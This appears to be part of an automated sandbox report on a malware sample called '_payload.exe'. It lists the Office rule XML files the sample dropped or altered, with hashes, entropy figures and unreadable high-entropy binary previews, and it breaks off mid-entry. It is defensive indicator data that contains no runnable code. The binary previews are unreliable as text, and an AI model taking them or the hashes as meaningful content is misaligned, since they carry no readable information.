                                                                                                                                                                      SHA-512:FAE8F1DB9DFE0684728D84B9288CC8B7B34EEC01D15FBB6214695DAF6686A4204BB145E879D945A34BCC108E65AA423EF6F13241A2EED7B31655F83006C49963
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?Uo......h.L..)..=..".M../...\@.%M-....P...>......O..@.]..K.'.|q..+.&IO._..q.......zgM.@B3.......-V.T.1............}.U......u..&.....%..t....$......\..5c..3..L...cO>H....UC...{>.-....O.oM9.tn.b4...L.e!<.sa.v.....|..8.R....f..|.qe.....o.q..{7..4.F......s.u.......x<d.,..<G...../*3I+.m.W&(4...y.E(..6...<J.lc....J..%.9w..dOK...q....'..~.....k`..9......J..}<.)>C.......'......q..;@....E..d0.3..l......U?..s`....s...b..j/H}........o.l.]..z.pR..I..3.M.....e.h.*..q...Z.#<....T.q........&..a\.~..4..qq....Xzg>....{..y..1..3..&..z .....oO..&.f.J..L7..eq2&LS..;...''H.6...yH.7....}!.K.....A.*.f.?...~.f.....R.1.bR..(.1.~....+....g'..2.t@..y..I.`..h..g.J1.<....XX..?B...x..^..O.....O..qA~.Y.g...SP..]...y.hvs_E.;3...f........j[.0e.F.L...e..,3.....<M..@q.o.qj.4;@...oW......`s.a>zc.T.,@l.ef........W:$.{.......U./..t....G....Q..S......%@.',u+.".!..B.W?.-..V*g.y.L..._.T(&d.=.-...w....S]U...s...0.3}.U+..I~......00v...e..Z...7..K.W!.k.......dD.[.....h!C.}....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703701v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1749
                                                                                                                                                                      Entropy (8bit):7.894144119581898
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:kN8hge7ao1ll2pAHctnIslfoIFzcXDqHnk4chdNFxi7bddeWQ7H2JYhfMNy9G1RU:kmg1ol2BoCAOxiniH/w2KN9+uvdD
                                                                                                                                                                      MD5:C3A4D5A5158624C8A7D65A5102A87A6D
                                                                                                                                                                      SHA1:B683D1946833F8AA3D644E5994C08A012F6C312A
                                                                                                                                                                      SHA-256:6057DCB09D7848EAC5F4D82B286950EBDA1C81AC4BEB83F706AC3C133050187A
                                                                                                                                                                      SHA-512:050C2327FE3A4ADC352C0A69C2E70EDACBCB3137DFD032B1886BE0C37D6AC7CAA4B0CE6E583BAD91930DF5A0A303604E03291DA3D6D33B9AB2523637E4DFFB4F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?C8eXi;..g..q?....zq.."....j|..s._...pU.....z."....K.s.-m(.I.9+....."X.....H).Y.)..g.|.$......[l.g,..w..I.))..bV..dy..Cc...U..#.+....6.I9vK..?...qc..H.S?p....yJd.A.....WJ.}.......l.%.5..#X.C.....=qz*.li.......,.#.#arq.....+k........!E..JTCuH..s.E.p.l./.Nb...d.3K...Y..,..+...y, .f.........w..3;........'x{U.u.....*vR..s..RY*m....+...[z$.......yK{......%m.J7.l>.]g......"%..n...}..9.S...}...m\...d..$.0..{..L.......Vc.U.;... .....K~..Gz...7`wnj47..&..i......k..V.A.r.v...f.....u.q_..J.u....8w.?%......[...:O.~.27..-.. .C....._...\.........N..7.}.......y.>..k...L6.......-..u-U2.L&.0.W.Iu.-s..j.....;/m.%;.q.O@...N...c..W... ........^.q~....%..k~.s.\.....T@N.1.%}.......Hy.tw..Yc....Nee([s.....W.~..xl....@...eT.....51e."..W.y..h..d.z..gf!`.}..Gf?S.....)'.?...........N.:La.....".:7Q6=..<.....'D..V.....=.oo.E..1...%..nf".F.|].....w...o|^(.SV.0..-`.2..J...%....]...c7..g..8..r..m.6..1k4p...._.Z/.'.9...2. .....8#=)%w:.j....b.:~ra. .~X.|.s.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703750v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1734
                                                                                                                                                                      Entropy (8bit):7.890023435205217
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:ic6kRTYxwf9A6oi53i/wW1F6CJ3Q7QVedtZGD:0kRTYgVoPQg3dVIZe
                                                                                                                                                                      MD5:23BEF3E68D188FD83725FDF98EA6423D
                                                                                                                                                                      SHA1:22FAA24997D6C14C69D2A27C5288488370A52F73
                                                                                                                                                                      SHA-256:C4A4ACA3254AA282D1B2C186428A268F12365423311FF2571FBE75C204C0564A
                                                                                                                                                                      SHA-512:2AEB2604F928F5799D8AD296C0313085FC8B3339557DFEE1ACAA2A3C4DD0883023A600072340A4938D79CCE517687888140C4DD0B6BFD8598386F946CA695F55
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?..%........h|...<w.K....A..a..IZ....%!... !......)q.n.^..".D#.......f.......p.....F;37+....m(o?....9.|.W.:.".E8z.m2......f.t...7.IG.w.\...:.6.Lm.c.B4`]|.$."......]..&.3no.._UP@.....}..C.......a.n...:(.q~R.Y..X.0....)98...;.!.....@.n'.`(..+..y...~zMQ..J..Onv..e.A...6K...z.a#.<P....VCr.....S..S,.a...^>.0$.Hl.g!L.....O..0[...S..L......sL.v.h..qP...'k.k..........<.V. .0.,...J.G.:B;...A6....~.@k..3*HA^I.]L..B..I.mg.er(..1..5.ko....,.e.u.0..v....>..!$F.S.z.(..Z.......z.;m........p.C.*........{.DT.R.=....r&/.(K.L..=...1.$....Mp.6.y..E6,G.A.5.v.!...U./I...H.*.5..e\.....X:1"..:%....S........p...;...Z.rc....q9ivb.-6X.....FQ......,.1 ....'.h.^.d.j..x.......'q..`.....^.i| ..{......>....w:{..3iG=.\".$.o*ZWn...v/.1+....g..!.]w...[(`8"...i.f...T."j.{...%w.........v...2.2'..f.V.L.Z._.......9.B"..N}....-.i....?.^.T.6...W8.O....;...|..7...2yj..".}...........w..Q..]....c..x3s...W7.l|uR...q...k...l...!.;].....W...N.b..ai.......u^%$.E.P.3R.a

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703751v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1771
                                                                                                                                                                      Entropy (8bit):7.884426936266
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:rLcUJnuurFXo7QaafVm9Ac9J2HJ3aRUxD:nSupXar0m9AKQp3aRw
                                                                                                                                                                      MD5:03559F781EEEC893635391E8EBEE6DB9
                                                                                                                                                                      SHA1:E0DD0F1660CC579C72C9B02258C136CC6F1EA511
                                                                                                                                                                      SHA-256:09665042F951254F4AD17397100F587F5286126F48A7A50617C731F663E782F6
                                                                                                                                                                      SHA-512:2F7A2FE7F805EFB1EED3314945962B220EF1C10FAED8BF84792CCEF24D82981CAE89C74E30FC372DE8A4005C2534AED97B23F2597165216957EA227320DB7E83
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?.....W;S2.....Ce...9'..J...^........g.........>....}Z ~k6.x..............#./...Z(....\.#H.s... ...".._Q.n)....kVT.ei.-1.EC]..7<...).....D.H.L......K\....6..8.a....:..SZ5...t.......m..:.H...$.,..cb.Q....p3ZS......S5H....m...)-.G..w../.c..Y...~T8D.>....1....#:v.eu...+w....Dr:E....=.Nk....\W.[.5Y..H%..+.....=...%}*.lx.....=.z.....4.8"...)I".}.7%.&PkjP.,.x..U._...8.I...J.(4..>o..........45.;h6..Kp;...QR........p.....w..\....In}k..j.W..z....R.m....%.a.?..]}.W.?...-m...j1.Vn.=.}..6...V...TS....AQ.!....wc...b.jD..-........[l99R.$....>\..[x.P(...A...JE.e.m.o.rc..M....a..0..^..e.)zH|y.....r3k9....p\...f...w.ct....j..>......\...@.....-.W...]R.,.b?.a.2.k...ub....cB4..8.k......F.7.'.P......Q.z9.%ha...Su..I...o5.\T.>..6$.:.}*z...y._..&..%..}.kx.$Z.....UN.....'....v......Nb..A.i......u......z......-.6.+....l=M.%HO..b......Gu:6..mn.`..............s..]V.D.i...._=.{..o|u]..G..`.R.7U...{O.`.-..h....t....n........H.i.......B....#.U)...N....d....0.....;..|.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703800v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1716
                                                                                                                                                                      Entropy (8bit):7.886912653538406
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:n0Zs6/N+n5Y83Sc1f9eZOMN0Tf/tUABxoYpbLYdUlD:n034n6Fc1f4ZOwkvpvYdUd
                                                                                                                                                                      MD5:9C9C7422083A9CEA19B0C458A109E662
                                                                                                                                                                      SHA1:27C339A7BDE11F7597991B35F5081235CFDD9648
                                                                                                                                                                      SHA-256:3A7D895E1FAE9EEE901B35D803A89E5048D3AB3C20AC3FFC17E988F82D5171B3
                                                                                                                                                                      SHA-512:5C26FDD55FEB088E0C27A07E77792F599456D62A47BD5593655E8088EE9F82B58204EFA3596AB658D56E363F0F6296A16F9D7301963C0D895CB84C10A0C5273E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?9.@....\...1~.....:.u)Q`~a.....l".:?^U.h.m9C.r....'..,%.,G.F...m-B~d......Fa..@.X.C.Z....#g.>.pJ.. .....0.B)..;....d.L...4.A..)\...P.5..O..T.'ze2.p.r.H)...r>.SJ...6l.tD...o....nh./Y|..?.L......5........C.i.s..$.-....V.@......H/......M......Xz....g..I.;.A....P.J...A...w..D.@;.....`..m...s(..cBb..h.*Z.T...JN..6.:M...".....B>U..&a..2Y........r8!.S.'H.~..l....]v..:.MI.,=.#...=..(.,....V...-..*..P./"..ZP...h..Y*.A.....N..T;.!I.9.m..2J,^P...............Riy...r..j_...;c.*.+%..t......k...@rF..9...^...{.J../....._mw.Z.x..4...v>....8..3_.'.-8k.F.\..{GCa?5.R.l..U!.g....Xk:2...*.#jm.<\.HQ_;k.6.s..+H....x{.&q....de(....`WT5.2`o.......m..n..=..\.7..)...-...uW..F5...X6.Ah..]..+.P.!.qQ`....D..$.{NH.\..R..@....y.R.x.w.E.fm.K.....be\...<_..$...e.d.a.....X.....?..=upQwv-...>n..^........>.F..D.0.....E.@~...." ...8:<YwE9<.mc..+C.^.!.B.....'T4.='qZ..+..).g.7u'.F...8W./!..Z.....2...XSqwk.d...E.........fe.~.K......n.r...+.].+.C..=..:..$.1........O.^7..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703801v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1753
                                                                                                                                                                      Entropy (8bit):7.900788946891597
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:UzV5Gg32rs/PkzM4tmNoocvzqonyrBQSDD:UzOg32g/PJ4tDrRyp
                                                                                                                                                                      MD5:B6F3196C7A40BA4B78DEDEA7E6DCB097
                                                                                                                                                                      SHA1:54E2631F3DD4DFD21A6709CEB496D1C20878E956
                                                                                                                                                                      SHA-256:8BE02EE5CEBCB78D3F7A8FDBDFB354F195F7B56AB2E9E773D8BCBCEACE268A04
                                                                                                                                                                      SHA-512:3F454FB749896CC3296042D13194D5C0AA98936F4E02B78F6BE7FA5164388F72A76C63CDBF355024665E7F6E0A4825906443AE9B16A987AC085ADD502F4F69E3
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?......@.?7.(.)5..yK2.r....le.A@.{....B:.:.F.`..N.d7.Gl.t.<5.....5.a.vL...Q..{..g<.[..g..}.T6.5.A....m.....z[*..[M(.6?'...G....6....6..j.........Gh.d..S...f....l..o.a......Z.O..|.. ..".........J|V..i.{..;....\3.....0..)HG.+.....R.g6:d...N..#.....Z....:.S........L.....{=F.fK..4D.\T*0D....*w?V..9.~..E...U.G.,'..#..:(V......z.fI..CP..xr....y.......h.j.0.w.1.cR.eD.u....iJ.?.}....F.p.J-..%|[.J.^.|bC?.u.3<S?..L.J...Y.E%j.<..8!2.w.......E..b..^;.N.y...p*i...Cn.../.w.+h....1....R.........n....3...e......C.SK.0..O.-..2PDV...<h.V.z.(.2....O..`MN.c.+...P.k.$...1O6K.../.M.g...Qc;.{v..k.0.=.W.pHBu../.vUdCs/...0vGk..R.......ck.X:.p..m~..:.........o.]B...F.X.@R....h.05j........k.......[.q.....~R..S.C.gw.R2...@......]'T..]....\.-...2,.>.....t%..B.......Z..:.R...O4.g...65@%.....q...[.bX..$Z...Mu.w.4.5..T........l..N.....Ej8..V...q.=...s.........W...=4.........._......"....f..&O......qX....).T../.A7.z..z;.!..[AZ.i..[...Y?G.b.P..W..E.m7V|..KmT.......+..b

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703850v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1739
                                                                                                                                                                      Entropy (8bit):7.8842731887786055
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:1djo5/inR4B6Nd95gvm0Qtz+FLomMhdr/NpVqD:1dj26SB6z/gv1Q4M7rFpVi
                                                                                                                                                                      MD5:E2EE6C177248B01987F6ABF3E7DBB5BE
                                                                                                                                                                      SHA1:4D0E6539E45C9492C0B4A65B7A89CDDB0A722E61
                                                                                                                                                                      SHA-256:3B48B95A0232A509E1923DF4A3F1DEF1EA38154758766D4667854A6A21B1EDA8
                                                                                                                                                                      SHA-512:412DE68EB7FF8C195188BFDDC2FA87E59FB6F5A5868B25B342DDD6B526BD603EE8C38F38C5BB9AC15DCF28CD8FCEC62FEBBDB68F373036AE89F5B97BFFC18C7A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?...F5..I.R.S...I...9j.0...&]./`.....z...U.e......'..N.Y..}...>....>4k]..L.....V......<..x.B..s..Qd.....F....[..Q..8<..u.e...<m..qd.....d.......\P..*$...H7...zuW.....3..f%#..n...........{r.....kX..6.[..d.L.=.'..................QO.j.c....v.w..D$8......h7f.s.Rf..}.....OD.:..O..^.Z.S....[.....@......V.4...A.(g.z.|M.g-j.|..<0...AT..P5.u)qX...Z.......0%3...ljW........)c.....T.c..Qd..Vf.J....*x$0...#3.'.....%a.-....ek4y...w..<7.Q.|..(.t2.$...j}.;Z"L>..1.C.5l!.(".._...>...)e..r.4@..R._..x6.....KlI...h.=.25Wa.<....JF.P....r=a.&.#dF1._.~...&..fE..v.>.V....i ..3@b....kKx.5_!...K.^*(.(.....Q..........\)s^.na.O..i..r@f.B...Y...C.&7t..-....X.......}....A....c.k.8.1j.E...,..5...b.......p=Z....Ug.%...u.F."P.5.'.U.......P.`.3...D.2.7...1_....C..|...i9........jW.a.f.e..F...9V.-..5...7..W7'...I..gy..;.Y....R..l....^H.U.dg.....s$.T.1z.(#m.<.".}.|.......0....%;.r.W["...Gd..{....U..j......4.yH.Bd..K.;...;e.@.D2v&cO....=q9..Ra.hR...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703851v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1776
                                                                                                                                                                      Entropy (8bit):7.890814508322403
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:nig456vOxVR99f5WOsHICvis/V2SPu9q+osbD:nid6vSxcKs/d+osX
                                                                                                                                                                      MD5:235B50FBA2B364671AF0E3A05FF71F44
                                                                                                                                                                      SHA1:B65ABE94267DBD291E90437F7CDBFC150236302F
                                                                                                                                                                      SHA-256:21499621CDD7B70AD73D296B18F2361F771B5B5EB1BC7E7DC8146C913FB67C41
                                                                                                                                                                      SHA-512:10E705E681BC04F0FCBC0E593EE0B4602A8B616075FD6EC7753A0E736479CBD114D247D89BD46DF8168C3ED45E3096DB7B5F400C690E8D80AB867995DA9E2FCB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?V....t...d.%.?.(.;...D....P.u.>K...`...[...`..r..]..!...r.....T..q... .....(B$..^3'.....D.3.....T.?.{.#.w8...l.Y...r'O......-.v.kk~.GG.0>cH.lU....(..b..&<.R.z:.$?...K.)N.q...m].L..X5..+h..D..#..q..O....[.Bg.....[..U.......s.....Vi._.6......0.T.....~.....^....B`K..............;.&.V#?....4...-.V...2e......^.^.9....,d.Y].....$.._-.....`.O.B.&**..2...c..i2..D.pzn..=....\...l.Q:.........:..H.3.+(..foXG^...8.W.Y.......-..3..V..H.t.Z=...)..5.....D..?_..e....K.H...H.3|.o..#/b............g....d...).....*....!...ORq.8...K.......3.Q.{....J...".(.......y..u. ,g..}..d#[.u.d..".quN....)Z....}..6.e.4p..rx>..V..h.`B.- ...~..>....<..|.i.J..>....RiP....5..G.|&{..D.[.._.@..E<.../.Z%Q...E5:.p.m..6$.K....h%5..F....OT..<..r@.....s.c...<owk....{.....b..cj../R...*..>..)*.Q....TI..R..8..W....2..Znj...v.hqj..'K3..oB@..W.F.`...>.w...C..`....IP...e.f..-.&}H.2C~<..[D>.EI..l....G....Z...-...J...d.g.Ub......C{....v....%?"..B.`_P..X..1.u...7qu.0F..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703900v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1724
                                                                                                                                                                      Entropy (8bit):7.891446910754149
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:dXsrl1hbzT6ZoQpb21989xa4uKuiTEh+kn8gxzUcqxmPqNj4iQ48yu5TV8HV2bD:SjK419I44uKuWe1qQ0j4i8XD
                                                                                                                                                                      MD5:F791850846EDFB43CE7C3ADAC290DFF1
                                                                                                                                                                      SHA1:F5E83FF77240D94015DE398BBDA2386B601C94A9
                                                                                                                                                                      SHA-256:CBEAC72D42B3E3686BD8AA2357C5B38B929851F4D742E668719E14DDA5F79E4C
                                                                                                                                                                      SHA-512:FF0FBFC4641CE050A4589924AD98844AFE48AF2DFDF4908A09FAD3E36C41F5EDED4F582AF35FBF7CDAB463EF41843E22B409EA0A3EE2A7591D6A74F34A29A2C1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?..}......:}z..P).}...Y.`qQy:&.*.n..}F.....dh$...4..})dUYu.............R..r9x.(.1.s...1...!.L..S\..3..kvm...kg..O......u..7n..]mk....%.\.D..j....h....w5..}.q..p#*..FM....M..B.$c...b.N..B.E.A.........x.B.(..I...|.R..[.`.r.Ze)....U....)..<.>R..K.X2..*........Wx....y..3.U....8._.e.D.D.....2.Q...D=K..H..... ..M.D..8.?.e..GCH~...b..P.j..7=...$.JH.Bn.5t....U..-..!...\....\)\.(QZ~.e.<..\.C..-...>.t_h&..Z..*.J..\O....dU....'n'.....S.....I7...G.?.G{..y}8.t.L.a...U.zj....k....l.1\...j..r....gV.0....{rp1\~...1![.zZ..:..Nd.A.#.1....V.U'.;.7...>.n.E.Y.Z.2..hg.'.t..N.w.8%7t...f.-\.........%[..g..1.q+...q#.fx.&..d.:........kz.iq.......'......a1%....x.8......D.......w./.B...jr/.y'..TN..q.,.i...X'.>..f..W..j.s.D-Dr...!.W.1..F:R.J.Viy.F..*..k..t^..55)....l._. .u....*...VRC..W.rg.~......C...3...cX..?.....%.....hA..c...'.wNip.O:r.X.....-.M..J.wJ..o.=.!.....%...x.k..X>..A2n..7.j.f..7vj......y.R....~.,......d.:R..$.#o.fhH.....g.9..G.....&f..#._.n(....n

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703901v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1761
                                                                                                                                                                      Entropy (8bit):7.886560443044898
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:9xEXgS9tNAg/KeHp8W9ELeQnljqEx1fbhTWJIRvk3YuX1BtpFwFmVO5PI38VDSlK:nUj7DDJ/+L/lFfFqkvs1BrFVVOI4MKbD
                                                                                                                                                                      MD5:2F73BC96FB6EAEA8BB2228081CBB0D23
                                                                                                                                                                      SHA1:6568FBD2BC7F4603576DFD12D78308ECCE05A277
                                                                                                                                                                      SHA-256:0CB062FD5001B7873C71E972ECDD827EEEE6C5E5F6EEFA9B38E9DDAE2BACB64C
                                                                                                                                                                      SHA-512:9715D8AC1161DF643DC856C212BAE636EF67DE0D9C6D8F3C31AC406656B1AA3786453FF541D8A4B5079E399E75D2A45A82E432ACA3E83A6DB0B5E0F725F71919
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?w.bo...f.V.q:.*0#.(.&.eY1......*.!...4..vD{2.14y...&YQ...=..@.....I...L'...z../hJ;K.]R..0....{.N......E..)OE..ol9(.U+.#.,i.\.F..>..C.i.Tb.U8u..F.7....5u..g.<pI.1.......QsI......Z.5.d.IPW..."...0...@.JB)....eQK.,..l.E..[ws..'.......q...p........E.iNmd.;.q;.YYLt..:.....+c.v('......ofE$B...M..L.hsO..?.6x.....GP.L.....V.p..R3..6._...Y...{..?.n.?.:...W...G.\.(.......(e......=.@..US.t>L.1... ...)M..y.V...k..w.""..z..q:...Q..#2.._..R.X.,...\...Z....S0'L...Iv.[.<..3...:.eF@=...$.q.6.4.6...W|>6Ic.$..[......=Y.9.@......P.f.-..v.01F...3.-...v..6bM...m~+n.D.<..&.....@.......!..L<..wa.C.....]'([."..F..)Lo'..Y.M.3.".....?..h....A..7.j.f..3J...~e..0F\J...{.|pW.g...i.u..u..|.....w..g.5.*..G.[/...7..g;.A....{..w;..~e..........VR.{$:..2..`....u.Y........c........$.>.k.)3.....:.GK.j..._..BJ..}.R.t.UBm..8q...Q....}E....5.=.]..pGq[...n...F..[~.8....#.;...D*....c....@....\.GW....J..o8...aN..a....%b|.2.w....W..S.W...j...z@'.D......?'P.....+..s...a..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703950v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1700
                                                                                                                                                                      Entropy (8bit):7.883702925567381
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:c3OQQcJSnUs6bGNr1QOwI+1n7hP5P0vXFPIw4D:GQ4SyWjw7BtP5MvXFPIR
                                                                                                                                                                      MD5:E7DA1A53B44449B1665B10D31189C1B9
                                                                                                                                                                      SHA1:B6B3CE88E334DAF6CF6C0EA3E3C77D9DB9CC2C6B
                                                                                                                                                                      SHA-256:6F36E9299222AB8C9702ACB55EFD4E6F3EB0B4D6B75E6C0843AEA49D12C492A9
                                                                                                                                                                      SHA-512:E8993F87CF3ACBE62622B03F1CADEAB9DD12052BA2FFAFDE46C3D2DE243F5DFD64826F1C2D55D1A59831F1495CDAC726C4A6CD280A74D9D7F45102FA650B42FD
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?.J...h{.T)......a.<...k..6#15...b.F:.P.:r..)@..=.(.].}...N.K...R.c^12.A.6k.I.e|RS.o..#7..#..P...H....d>E...N...S.[>ZX...n.J.F..f..W.......M.3..=.....9W..6.U..<.m..v...o5..~...h.@.+...Q.7.{...b.p.k.c.^:ep....a......I....o...e/E..L.hZ"...^..C....L..X..q..U.O..P.(]....}j.Y..df.|...t.z.J.5.G....#..O.0m>._pc.y6H`.......3....dn....&.M.N..4.U...].w.}...B0.+.....S...K...16]R.K.w...<A..(....jt..<T.S...1t......;..K{.....N%-J.'P....%.l4L.K...a&.%....}.xa:.7.........2...K+..`*....w......I.D....'sA...cA......a...?....*..ox....i.&..O.J.&.LXS.&/........@|.s.5.r.....Ah+@..1....]....=@..1BEf....)..Y.).x3.Zy'X.~^..XS...`.+(..s..Q...Wp..}.An.t<6...d....xY..#.)4\a3.4...v.S<bS..K..xX(...,.;.S.......{.....+..s..t.....0...V........../..RQiJ....iE...KY...~..X...j^].yO_J..]6.r...z.......B..h.g.w...m.v...vpu.....;e|..~.PV'...x....z..4.7..0....Z.....c...X5nm.k.]-..8;|.8........ v@.Z._.uv........e3C.Bt.I........=a..b..M......;....W.n..6W...W.$...#.;.H@.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703951v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1737
                                                                                                                                                                      Entropy (8bit):7.890198757585454
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:9npI0Qo2OYN9LbmJ0b64IbFA/qw6oesTlUngY1D:9npIzo2OEIJ6ioFydN
                                                                                                                                                                      MD5:9639D5055F74546F490E76C621434385
                                                                                                                                                                      SHA1:54C9C30D765FA7C32444E3FF6120B5950067E6F7
                                                                                                                                                                      SHA-256:3C191BA955F16AB7D41FAEBF265D21A0BB392412A98014DD145C131FDA247A55
                                                                                                                                                                      SHA-512:4D447297539F2910DCCE1DCB326FE2001661237B6FD0C4F386941FE65633451D9C590F9AC608AE40F16B7F177EEA166F332700EBEC717BAC5ADBD8312523B350
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?8[.?..N..i..0..IBH....@..d.Y3....=.NvE.'...oQ..$Y..{H....Ls.uY..X....n.M...3.9]U.!>.....^...a.g..+1..n.5....&...c14....[...Lc|....~....!....[.C1.H..J..R1J.f.y..k.%..1..O.i....*p3..$.).^.p.uY..#..Y.Pq...\.@.#......Jh.k.Z...e9.........L2S....H...,hq:.Z...wn../!.l...i....9...w..8.{"<..W.....ub..u..>P....uf.j........!=}l<..d.RK.@.I..$P.-...Kp...X...P....G...kAG....A..A..C.M...~...xx..*e&.1.>.t.......,..?o....j..0w5s.,..~.....x..w`cg.M.O.......^...J..g;..{{.....J:..e.!n.[..b....%e.o.m. ..Ob.s....$.\_.A...JB...}..4..[..WR...[x.Q.$....&.......8.....^...P.r.....Q.&........Cg..~.....T>.j.m.;..A....$*w.....*.... ..x|..l.K........(<..U9&."tx...AY$.v..o..z.l$ D.WT..gyb...U.... .jt..............xH..)..|....i.....l.W..Y...1.:....+...g%3....T...w.zt~.y.1....L..J.PiT.b.V}.q|....}......%.G$.....I`?...:7..C-".9.F.W>......`...i....k.M..#.,V.$...r.}....}U....kr[......V..!....TKc .^........'...Z../b...0.0..(.l..!.tr.......04.k....R.{.O......q..fF.r

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule704000v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1716
                                                                                                                                                                      Entropy (8bit):7.913325738579568
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:Ave9a5/VbGMQ0RtdNlXfQLa7RmVa2d6TT8bD:A8a/ogT5XfQLa7sZiO
                                                                                                                                                                      MD5:195AB9FBCCCBC1E5D6D1BD2CF9617835
                                                                                                                                                                      SHA1:25DD66D84839453F56D45726777518BDA63310A7
                                                                                                                                                                      SHA-256:66088F51962CD4CA7DA5D58C50ACE2A2D499D9DEA8A3FBAE868F003CC9D62A67
